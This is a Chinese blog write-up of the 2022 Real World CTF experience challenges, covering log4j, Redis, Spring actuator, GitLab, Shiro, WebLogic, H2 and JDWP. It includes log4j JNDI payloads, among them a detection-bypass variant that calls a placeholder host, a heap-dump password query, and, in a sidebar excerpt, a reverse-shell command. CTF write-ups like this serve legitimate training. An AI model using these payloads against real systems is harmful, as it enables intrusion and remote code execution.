2022 Real World CTF体验赛Writeup

已于 2022-01-23 22:39:53 修改
阅读量7.5k 收藏 5
点赞数 2
分类专栏: CTF_Writeup_[web] web安全 文章标签: web安全 CTF 安全
于 2022-01-23 10:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/122646842
版权

还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。

在这里插入图片描述

log4flag

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp}
在这里插入图片描述
存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}
直接搭建jndi服务,尝试反弹shell
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
flag:rwctf{d4b4b837f95542aa93b43ee280b230d8}

Be-a-Database-Hacker

在这里插入图片描述
根据提示,6379反弹,很明显的redis。
获取题目地址后
测试是否存在未授权访问
在这里插入图片描述
很明显存在未授权访问,而且redis版本<5.0.5,这里可以使用redis主从复制进行RCE。
在这里插入图片描述
在这里插入图片描述
flag:rwctf{c4374dba71fbf50144f7a1a04b7f5837}

the Secrets of Memory

在这里插入图片描述
在这里插入图片描述
tips很明显了,Spring Boot ActuatorRCE
在这里插入图片描述
访问/actuator/env的时候,actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换,以达到脱敏的效果。
而这里提示,flag就是password,而这里的password,已经脱敏。在这里插入图片描述
在目标既不出网,/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下,很多获取被星号脱敏的密码的明文的方法就失效了。
这时候就可以利用 Eclipse Memory Analyzer 来分析 /heapdump/actuator/heapdump 接口下载的 jvm heap 信息,查找密码明文。
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
在这里插入图片描述
flag:rwctf{d597d5defdd22829d8587efb9f9d0954}

baby flaglab

在这里插入图片描述
在这里插入图片描述
考点是Gitlab的一个CVE:CVE-2021-22205,直接echo 写 反弹shell 到 tmp目录 然后赋予执行权限 然后执行就可以。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{4edb62cb7b37d647e13bfed4f8d4b860}

Ghost shiro

在这里插入图片描述
这个环境现在一直起不来,很迷。
讲下解题思路吧,shiro,但不是默认key
首先通过tomcat Ghostcat(CVE-2020-1938)漏洞读取shiro.ini配置文件,得到key:ODN6dDZxNzh5ejB6YTRseg==
接着直接打shiro550漏洞即可。

Flag Console

在这里插入图片描述
在这里插入图片描述
一个weblogic的CVE-2020-14882,不多说
在这里插入图片描述
在这里插入图片描述
flag:rwctf{a4c0185ddf2a4e679bd6f1df137c12ba}

Be-a-Database-Hacker 2

在这里插入图片描述
在这里插入图片描述
H2数据库,搜索一下存在哪些洞
在这里插入图片描述
CVE-2021-42392直接打
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{6288999b40cda6a393f247ef82e137e2}

Java Remote Debugger

在这里插入图片描述
java debug调试,下载附件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
附件是一些java程序测试代码。
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。如果这个时候就必须开启远程调试功能了,此时就有可能被攻击者利用 RCE。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{2c0e7100bcb45cc825ca97eccb86e568}

keepb1ue
关注
专栏目录
OFPPT-CTF 2022 部分writeup
ShenZ的博客
03-27 5095
OFPPT-CTF 2022WebLogseasy webLFIlibraryChocolatephp WebLogs easy web LFI library Chocolate php Cryptography Rome famous general Milkshake Transposition Forensics Shark Windows memory dump pcap analysis pcap analysis 2 pcap analysis 3 pcap analysis 4 pcap
2022 RealWorld CTF体验Writeup
末初的CSDN博客
01-23 2065
文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote Debugger Digital Souvenir rwctf{RealWorldIsAwesome} log4flag 有一些正则过滤 网上bypass方法很多,随便找一个就行 ${${::-j}ndi:${lower:rmi}://vw3nw
探索真实世界的CTF挑战:My Real World CTF Challenges
最新发布
gitblog_00070的博客
06-26 253
探索真实世界的CTF挑战:My Real World CTF Challenges 项目地址:https://gitcode.com/phith0n/realworldctf 项目介绍 My Real World CTF Challenges 是一个开源项目,由一系列真实的网络安全(Capture The Flag, 简称CTF)挑战组成。作者分享了他在2018年和2019年的Real Wor...
2022 Real World CTF 体验 writeup
b1ackc4t的博客
01-23 1878
log4flag 最近风靡全球的log4j2漏洞,加了一个正则过滤 用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps 在自己vps上使用工具搭建ldap服务 https://github.com/welk1n/JNDI-Injection-Exploit java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzE
HackPack CTF 2022 WriteUp
04-09 976
文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099
[Hack The Boo CTF 2022] writeup
weixin_52640415的博客
10-28 1791
hack the boo ctf 2022
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
自己ctfwriteup.zip
10-01
这个“自己ctfwriteup.zip”文件很可能包含了作者在参与CTF时的全部心得体验,包括但不限于解题策略、技术应用、问题分析和解决方法等。通过对这个压缩包的深入探讨,我们可以学习到很多关于CTF的知识...
阿里云ctfwriteup
04-26
阿里云CTFWriteup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞形式,参者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
2019 Real World CTF国际网络安全完满收官.pdf
09-20
"2019 Real World CTF国际网络安全完满收官" 本文档总结了2019年 Real World CTF国际网络安全的结果,并对Avaya WebRTC远程银行解决方案的成功应用进行了介绍。此外,还涵盖了保险行业云计算标准的发布、...
CTF】记录一次CTFWriteup(附题目下载地址)
TeamsSix 的 CSDN 空间
09-25 3471
0x00 前言 最近因为省快来了,因此为实验室的小伙伴准备了这次比,总共10道题目,考虑到大多数小伙伴都刚从大一升到大二,因此整体难度不高,当然有几道难度还是有的。 题目大多数都是从网上东找西找的,毕竟我也是个菜鸟呀,还要给他们出题,我太难了。 废话不多说,直接上Writeup吧,以下题目的文件下载地址可以在我的公众号(TeamsSix)回复CTF获取。 0x01 隐写 1 flag:steg...
VishwaCTF 2022 部分writeup
ShenZ的博客
03-22 5070
VishwaCTF 2022 部分writeup General Trivia 1 Trivia 2 Trivia 3 Web Hey Buddy! Stock Bot My Useless Website Forensic Keep the flag high Kali Linux 由 Debian 派生的 Linux 发行版,由 Offensive Security 管理和资助。 vishwaCTF{Kali_Linux}
Real Wolrd CTF 3rd Writeup | Easy Defi
竹林深处小茶馆
03-24 415
题目环境架构 EasyDefi是一道面向去中心化金融服务的智能合约题目。 题目代码通过附件的形式给出。 同时我们可以通过题目描述了解到 ChaitinSwap的逻辑和Uniswap基本类似,只是更改了手续费比例。 ChaitinBank听上去是某种提供了借贷服务的Defi项目, 我们看一下代码: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NqtE0d3V-1616574227436)(https://s3.in.chaitin.net/hackmd/uploads/u
SWCTF2022Writeup
Amherstieae的博客
04-28 1318
写在前面:啊很久没有打一场完整的比并且复盘了,刚才得知有师傅读了我的博客学到一些新的东西啦,感觉写博客也是超有意义的一件事情,希望自己能继续坚持不懈的走下去,也算是对自己的一个勉励吧。 Game 图片在下面 下载文件附件名称为docx,那么一般文件就是一个文档,修改名称为1.docx即可看见里面正文,如下 对于docx文档有一个字体隐藏,或者是文字被改成了白色,如果有段落起止符的话可以根据这个来看,没有的话先大体看一下文字&隐藏文字 隐藏文字:选中所有文字,右击有个字体, 看这个样子就是没有了
KCTF2022春季 第六题 writeup
weixin_43044226的博客
06-25 497
KCTF2022春季 第六题 writeup这题,BROP提示给的很明显,所以就是盲打,不管怎么说先问(bao)候(da)一下出题人。首先我们一开始什么都不知道,就先确定一下一些基本信息,那么就先测试一下缓冲区的长度,最后发现缓冲区长度为0x10。我们先执行一遍正常流程,大概就是:当存在栈溢出的时候,最后一句话输出不出来,因此可以断定,溢出是发生在自己定义的函数的。大概写一下伪代码: 当然,输出第一句话的语句可能也在 里面,但是不影响,我们先爆破第一个字节 正在...
[UNCTF2022]web方向writeup
qq_62585641的博客
11-21 1224
2022UNCTFweb方向
2022 RWCTF PWN SVME
weixin_46483787的博客
01-23 919
前言:RWCTF上的一道clone-and-pwn,一开始没搞懂clone是啥子意思,后来队里师傅扔出来一个github链接,才明白原来是直接从github上拉下来的项目,还真是real word github项目地址:https://github.com/parrt/simple-virtual-machine-C/blob/master/src/vm.c 既然是clone就意味着有源码,有了源码对于做VM题来说就大大降低了我们的逆向难度。 逆向分析 说实话其实main.c在docker文件夹里似乎也给了
rwctf2022_QLaaS
令则
02-14 3631
rwctf2022 QLaaS 文章目录rwctf2022 QLaaSmain.py漏洞transform_to_real_pathopenat利用proc 文件利用`/proc//mem`注入shellcodeexp main.py 首先题目文件只有一个main.py, 内容如下: #!/usr/bin/env python3 import os import sys import base64 import tempfile # pip install qiling==1.4.1 from qilin
[RWCTF2022]DesperateCat(tomcat相关利用姿势)
weixin_43610673的博客
02-10 1238
关键词:el表达式、ASCII ZIP Jar、tomcat reload 、jsp编译过程中StringInterpreter执行、META-INF/resources/下文件加载进webResource 解压war包得到源码,一个上传功能,设置了编码为utf-8 写入的文件后缀可控、没有检查;但文件名不可控,会被替换为随机字符串;可指定文件的写入目录,且写入文件时如果文件所在的目录不存在,会递归进行父目录的创建,可进行目录穿越;写入的文件内容可控,且以字符串编码的形式写入(而非直接传递的字节流),但前后
2022年工控ctf
08-31
2022年工控CTF是一场以工业控制系统为主题的网络安全。随着工业互联网的普及和工控系统的数字化转型,工控CTF成为了信息安全领域的重要事之一。 在2022年工控CTF中,参团队将面临一系列与工控系统相关的攻防挑战。这些挑战可以涉及到工控设备的漏洞利用、网络通信的拦截与解密、工控协议的逆向工程等多个方面。参团队需要通过团队合作和技术创新来解决这些挑战,保护工控系统的安全。 比期间,参团队将利用自身的技术实力和经验来攻击对手的工控系统,并尽量保护自己的系统免受攻击。团队成员需要通过分析工控设备的漏洞、拦截网络通信和复现攻击场景等手段,来获取对手的密码或控制权限,并将此作为攻击对手的关键。 这次工控CTF不仅是对技术实力的考验,也是对团队协作能力的挑战。参团队需要有效地分工合作,每个成员发挥擅长的技能,进行攻防策略的制定和执行。只有团队成员之间的密切配合和高效沟通,才能在限时的比中取得优异的成绩。 通过参与2022年工控CTF,参团队将能够提升自身的技术水平和安全意识,了解工控系统的安全挑战,并积累宝贵的实战经验。此外,比还将为工控安全领域的研究和发展带来新的思路和解决方案。总之,2022年工控CTF将是一场精彩纷呈的网络安全盛宴,为参者带来无尽的挑战和收获。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值